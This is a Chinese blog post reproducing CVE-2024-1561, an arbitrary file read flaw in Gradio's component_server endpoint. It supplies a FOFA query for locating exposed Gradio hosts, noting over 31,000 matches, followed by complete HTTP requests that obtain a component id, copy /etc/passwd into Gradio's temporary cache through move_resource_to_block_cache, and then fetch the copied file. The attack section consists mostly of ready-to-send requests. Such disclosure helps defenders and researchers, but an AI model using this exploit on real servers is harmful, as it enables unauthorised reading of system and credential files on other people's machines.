首页 > 其他分享 >Gradio存在任意文件读取漏洞(CVE-2024-1561)

Gradio存在任意文件读取漏洞(CVE-2024-1561)

时间:2024-05-25 19:33:05浏览次数:20  
标签:zh 读取 passwd Gradio xxx Accept 2024 1561 id

漏洞描述

该漏洞是Gradio应用中的一个高危漏洞,其出现在'component_server'端点,允许攻击者调用'Component'类的任意方法,并利用'Block'类的'move_resource_to_block_cache()'方法在文件系统上复制任意文件到临时目录,随后可将其检索。这是的攻击者能够在未经授权的情况下读取本地文件,尤其是Gradio应用通过'launch(share=True)'公开于互联网上时,远程攻击者可以读取主机上的文件。

fofa

body="gradio_mode"

POC

获取components后面的id值

GET /config HTTP/1.1
Host: xxx.xxx.xxx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1

读取/etc/passwd

POST /component_server HTTP/1.1
Host: xxx.xxx.xxx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
Content-Length: 119

{"component_id": "上面获取的id","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "a"}

读取该文件,实现任意文件读取

http://xxx.xxx.xxx.xxx/file=/tmp/gradio/916eb712d668cf14a35adf8179617549780c4070/passwd

漏洞复现

fofa中搜索资产,共有31847条数据匹配

image-20240525181041666

访问目标网站

image-20240525181347353

抓包构造参数,获取id值

image-20240523145244814

将获取到的id填入到poc中,/etc/passwd内容被写入到临时文件中

image-20240523145219129

访问返回的url地址,即可查看/etc/passwd内容

image-20240523145145431

标签:zh,读取,passwd,Gradio,xxx,Accept,2024,1561,id
From: https://www.cnblogs.com/LeouMaster/p/18212923

相关文章

  • 2024永久免费破解版CorelDRAW汉化百度云网盘下载
     CorelDRAW®GraphicsSuite2024无疑是一款配备齐全的专业设计工具包,它以其卓越的性能和丰富的功能,为设计师们提供了高效且令人惊艳的矢量插图、布局、照片编辑和排版项目。这款软件套件不仅功能强大,而且价格实惠,用户可以通过订阅的方式获得持续的价值。订阅CorelDRAW®Gr......
  • 【2024】文字游侠AI丨一键创作爆文赚米!只需简单五步,小白可上手,附渠道和详细教程!
    在信息爆炸的今日,如何借助AI人工智能工具在头条等平台赚取收入?何谓“文字游侠”?它又是如何操作的?它的可靠性又如何呢?作为一名实践者,我愿与大家分享一些经验,希望对你们有所帮助。首先,让我们来了解一下什么是“文字游侠”。它是一种AI智能创作工具,能够根据原始内容进行二次创......
  • 【2024中青杯B题】最稳攻略 代码+参考论文
    *药物属性预测解题代码、代码解析:文章末获取**第一问:利用传统方法建立药物分子的分类模型,并给出分类精度及其结果分析首先,需要将图结构数据转换为适合传统机器学习算法处理的特征表示。这可能涉及到提取图的拓扑结构特征、节点属性特征以及边的属性特征等。对于药物分子......
  • 【成品论文】2024电工杯数学建模AB题参考论文+完整代码数据+最终结果
                                  2024电工杯A题点击链接加入群聊【2024电工杯数学建模资料汇总】:http://qm.qq.com/cgi-bin/qm/qr?_wv=1027&k=Uy68kNCPXL7q4MZgiXtbW0vsR15SxJDm&authKey=EL9MT05wX0ftuWYDMgvzVVim......
  • 网络安全(黑客技术)2024小白自学必看手册
    一、怎样规划网络安全如果你是一个安全行业新人,我建议你先从网络安全或者Web安全/渗透测试这两个方向先学起,一、是市场需求量高二、则是发展相对成熟入门比较容易值得一提的是,学网络安全,是先网络后安全;学Web安全,也是先Web再有安全。安全不是独立存在的,而是建立在其......
  • NOI 2024 前做题纪要
    快退役了,最后一集了退役前还能做多少呢To-dolist#32024.5.24AGC025DChoosingPoints讲过关键性质是距离\(\sqrt{d}\)的点为二分图,于是每次选二分图较大的一边即可做到\(n^2\)。证明:考察\((x_1-x_2)^2+(y_1-y_2)^2=d\)奇偶性,\(d\)为奇数时\(x_1-x_2\)......
  • 广东开放大学2024春《数学大观(本)》第一二三四五次测验参考答案
    答案:更多答案,请关注【电大搜题】微信公众号答案:更多答案,请关注【电大搜题】微信公众号答案:更多答案,请关注【电大搜题】微信公众号  中国古代数学是以研究(   )为中心。a.推理b.三角学c.测量d.算法答案是:算法被誉为世界“测量学之祖”的是(  )。a.惠施b.......
  • [pdf,epub]《软件方法》2024版电子书共290页(202405更新)
    DDD领域驱动设计批评文集做强化自测题获得“软件方法建模师”称号《软件方法》各章合集已上传本账号CSDN资源。或者到以下链接下载:http://www.umlchina.com/url/softmeth2024.html,或点击“阅读原文”。如果需要提取码:umlc已排版成适合手机阅读。......
  • 算法学习笔记——动态规划.最长上升/下降子序列 2024.5.24
    LanqiaoOJ 773这道题是一道动态规划的题目,主要考察最长上升/下降子序列,难度中等,但是对思维的考察比较重要,特别是如何解决其第二问题目描述某国为了防御敌国的导弹袭击,发展出一种导弹拦截系统。但是这种导弹拦截系统有一个缺陷:虽然它的第一发炮弹能够到达任意的高度,但是以......
  • 算法学习笔记——深度优先搜索DFS 2024.5.25
    LanqiaoOJ141此题是一道比较经典的搜索题目,这里采用深度优先搜索的方法题目描述X星的坦克战车很奇怪,它必须交替地穿越正能量辐射区和负能量辐射区才能保持正常运转,否则将报废。某坦克需要从A区到B区去(A,B区本身是安全区,没有正能量或负能量特征),怎样走才能路径最短?......